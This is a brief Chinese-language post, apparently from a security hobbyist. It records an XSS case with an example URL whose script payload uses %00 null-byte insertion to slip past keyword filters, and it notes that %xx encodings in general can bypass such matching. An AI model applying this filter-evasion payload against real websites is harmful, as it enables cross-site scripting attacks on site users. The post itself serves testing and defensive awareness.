今兒個遇到個xss:
栗子:xxx.com/a.action?n=123<scr%00ipt>ale%00rt(1)</scr%00ipt>
想起很早之前看過的一篇%xx-%xx都可以用來突破這類對敏感字符串匹配的過濾